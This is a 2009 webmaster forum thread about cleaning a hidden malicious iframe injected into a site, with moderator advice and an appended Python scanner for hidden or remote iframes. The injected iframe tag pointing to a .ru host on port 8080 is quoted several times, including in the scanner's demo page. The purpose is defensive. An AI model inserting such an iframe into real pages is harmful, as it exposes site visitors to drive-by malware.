
clean up injected code


BobMane

10:10 pm on Jul 29, 2009 (gmt 0)




I just removed some apparently injected code from a few pages that had a hidden iframe.

<iframe src="http://example.ru:8080/ts/inx.cgi?pepsi119" width=125 height=125 style="visibility: hidden">

I have also changed my FTP password.

A couple of questions:

1. If I remove the code from all pages on the server, does it mean the Trojan is gone, or does it still live on the server somehow?

2. If a Trojan or bad code like what I pasted above is in 1 page, can it spread to other pages by itself, or is it only FTP-injected once?

3. If a Trojan or bad code like what I pasted above is pasted elsewhere (like in this forum post), can it become active where it is pasted?

4. When I was testing my site, I would go to the page I knew had the bad code in it and I would see 2" of white space at the top of my page. Then, of course, when I looked at the code I saw the hidden iframe. Then I hit the refresh button on that page and I could see in the status bar the browser trying to connect, or possibly connecting, to the example.ru website. So the question is: if my computer was not infected and I hit the refresh button, would that infect my computer?

Finally, some of these questions arise because I don't know how far I have to go to "clean" everything. Do I have to reinstall the OS locally and wipe the server clean too?

It's a bit more complicated because I recently hired an Eastern European company to work on a new version of my site, and I also suspect they might have somehow caused this (not intentionally... they have very high ratings on Elance anyway, FWIW). But they did access the server a couple of times (and I always changed the password after).

So how do I know it's not me or if it's them? Sorry about the confusion!

[edited by: jdMorgan at 11:04 pm (utc) on July 29, 2009]
[edit reason] Please don't post potentially-dangerous URLs! [/edit]

BobMane

2:16 pm on Jul 30, 2009 (gmt 0)




Current hosting is 1and1.

The code that is redirecting (or attempting to redirect) is in the file source, at the top of the body code:

</head>
<body>
<iframe src="http://example:8080/ts/in.cgi?pepsi119" width=125 height=125 style="visibility: hidden"></iframe>
<div id="masthead">

The URL http://example.rn is listed on MalwareURL.com as bad, and it seemed to show up in a few other Google results.

--

This is code in my web pages on my server.

It has been seen elsewhere, e.g. by 1and1 support and the developer, accessed from Mac or PC.

A boot-time scan reveals nothing on my system (Mac or PC), and Windows updates normally.

It does try to redirect; it's a hidden iframe, but the page loads (though the page header/graphics are shifted down by about 2").

Then, if you try to refresh the browser, you can see it attempting to load the bad/remote URL (but it doesn't fully parse the page; it just keeps loading in the status bar).

--

UPDATE:

Turns out the dev said that they did in fact have a virus on their server which somehow was transferred to my server. They said it has been cleaned.

If anyone is following this thread, it would help to get some feedback, because even though I now know the source, most of my questions have not been answered. Given that I'm now kind of paranoid, I'd really like to know more about how these things work.

In addition to all the previous questions, how do I scan my server or a database if I want to?

Is it possible to scan for keywords?

jdMorgan

2:27 pm on Jul 30, 2009 (gmt 0)




If the object included in the iFrame from the remote location was malicious, and it loaded in your browser, and your browser was exploitable by that code, and your anti-virus/anti-malware programs failed to detect it, then your local (PC) machine is likely infected.

And if that malicious code was a worm, it could infect other machines on your local network.

But that is a lot of 'ifs.'

Similarly, there's no way to know ahead of time what shape your server might be in.

For your PC, download, install and run every free malware scanner you can find. There are many free and good 'independent' ones like the well-known Ad-Aware, Spybot Search & Destroy, and MalWareBytes Anti-Malware, in addition to the free utilities offered by almost all of the well-known anti-virus software companies. Some are download/install, while others are for on-line use -- generally using ActiveX in IE and/or Java in other browsers to execute on your machine. Run as many of those as you can find... my list is over a dozen so far.

For your server, remove the obvious changes such as the iFrame, then go look carefully at every page and included object. Also look carefully at any executable scripts that you've got. If there are too many files to make this inspection feasible, then consider simply re-uploading the site.

Since you've changed your server login credentials that door is now closed, but be on the lookout for other entry-ways being used. If your site is hacked again, you'll likely need to get your host involved to find the 'open doors' and possibly to trace the hacking activity.

Best,
Jim
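BobMane asks how to scan the server and whether it is possible to scan for keywords, and Jim's advice is to look carefully at every page and included object. The script below is an added example, not code from either poster, from 1and1 or from WebmasterWorld: it walks a site's document root and flags <iframe> tags that are hidden by CSS, sized down to a pixel, or point at a host outside a site-specific allowlist, and it also does the plain keyword grep the thread asks about. The TRUSTED_HOSTS set, the KEYWORDS list and the SCAN_EXTS extensions are assumptions to adjust per site; the two sample pages it writes to a temporary directory are constructed, reusing the iframe quoted in the thread.

```python
"""Scan a web document root for injected hidden iframes and for suspicious keywords."""
import os
import re
import tempfile
from urllib.parse import urlparse

# Assumption: hosts this site legitimately embeds content from; any other host is "remote".
TRUSTED_HOSTS = {"example.com", "www.example.com"}
# Assumption: strings worth grepping for, taken from the injection seen in the thread.
KEYWORDS = ("in.cgi", "inx.cgi", "visibility: hidden", "visibility:hidden")
# Assumption: file types that can carry injected markup on this site.
SCAN_EXTS = (".html", ".htm", ".php", ".js", ".tpl")

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([A-Za-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def parse_attrs(tag):
    """Return the attributes of one HTML start tag as a dict with lowercase names."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def iframe_reasons(tag):
    """List the reasons one <iframe> start tag looks injected; empty list means it looks benign."""
    attrs = parse_attrs(tag)
    reasons = []
    style = re.sub(r"\s+", "", attrs.get("style", "")).lower()
    if "visibility:hidden" in style or "display:none" in style:
        reasons.append("hidden via CSS")
    try:
        if int(attrs.get("width", "100")) <= 1 or int(attrs.get("height", "100")) <= 1:
            reasons.append("zero/one pixel frame")
    except ValueError:  # non-numeric size such as "100%"; not a signal on its own
        pass
    url = urlparse(attrs.get("src", ""))
    if url.hostname and url.hostname.lower() not in TRUSTED_HOSTS:
        reasons.append(f"remote src host {url.hostname}")
    if url.port not in (None, 80, 443):
        reasons.append(f"non-standard port {url.port}")
    return reasons


def scan_file(path):
    """Return (line_no, tag, reasons) for each suspicious iframe in one file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        content = fh.read()
    findings = []
    for m in IFRAME_RE.finditer(content):  # whole-file match so multi-line tags are not missed
        reasons = iframe_reasons(m.group(0))
        if reasons:
            findings.append((content.count("\n", 0, m.start()) + 1, m.group(0), reasons))
    return findings


def keyword_hits(path, keywords=KEYWORDS):
    """Return (line_no, keyword) pairs: the plain keyword scan the thread asks about."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for no, line in enumerate(fh, 1):
            low = line.lower()
            hits.extend((no, kw) for kw in keywords if kw.lower() in low)
    return hits


def scan_tree(root):
    """Walk a document root; map relative paths to findings for files that look injected."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTS):
                continue
            path = os.path.join(dirpath, name)
            findings = scan_file(path)
            if findings:
                report[os.path.relpath(path, root)] = findings
    return report


def build_demo_site():
    """Write a throwaway document root with one injected and one clean page (constructed data)."""
    root = tempfile.mkdtemp(prefix="siteroot-")
    injected = (
        "<html><head><title>Home</title></head>\n"
        "<body>\n"
        '<iframe src="http://example.ru:8080/ts/in.cgi?pepsi119" width=125 height=125 '
        'style="visibility: hidden"></iframe>\n'
        '<div id="masthead">Welcome</div>\n'
        "</body></html>\n"
    )
    clean = (
        "<html><body>\n"
        '<iframe src="https://www.example.com/embed/video" width="640" height="360"></iframe>\n'
        "</body></html>\n"
    )
    with open(os.path.join(root, "index.html"), "w", encoding="utf-8") as fh:
        fh.write(injected)
    os.makedirs(os.path.join(root, "about"))
    with open(os.path.join(root, "about", "index.html"), "w", encoding="utf-8") as fh:
        fh.write(clean)
    return root


if __name__ == "__main__":
    site = build_demo_site()
    for rel, findings in scan_tree(site).items():
        for line_no, tag, reasons in findings:
            print(f"{rel}:{line_no}: {', '.join(reasons)}\n    {tag}")
```

Point scan_tree at the real document root (a local copy pulled down over SFTP is fine) instead of the demo directory; a hit on "remote src host" alone can be a legitimate embed, which is why each finding carries all the reasons that fired, while "hidden via CSS" together with an unfamiliar host and port is the pattern from this thread.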